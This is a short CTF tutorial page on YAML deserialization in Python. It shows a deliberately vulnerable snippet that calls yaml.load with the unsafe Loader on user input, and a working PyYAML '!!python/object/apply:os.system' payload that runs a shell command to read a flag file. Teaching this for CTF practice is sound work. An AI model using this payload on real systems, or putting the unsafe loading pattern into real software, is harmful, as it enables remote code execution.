CTF Support
Toggle Dark/Light/Auto mode Toggle Dark/Light/Auto mode Toggle Dark/Light/Auto mode Back to homepage
Edit page

YAML Deserialization

Introduction

YAML deserialization vulnerabilities occur when a Python application uses yaml.load() insecurely on untrusted input. The PyYAML module can instantiate arbitrary Python objects leading to remote code execution (RCE). In web CTFs, YAML files or request payloads often hide this weakness.


Quick Reference

Task Code / Payload
Vulnerable call yaml.load(user_input, Loader=yaml.Loader)
Detect vulnerability Search for yaml.load( in source code
Exploit template Use !!python/object/apply: payloads

Example: Vulnerable Application

import yaml

def parse_config(data):
    return yaml.load(data, Loader=yaml.Loader)

user_yaml = input("Enter YAML: ")
parse_config(user_yaml)

Exploitation Example

To trigger code execution, you can invoke OS commands using Python’s os.system via PyYAML’s apply syntax.

!!python/object/apply:os.system ["cat flag.txt"]

When deserialized, this executes the command on the host.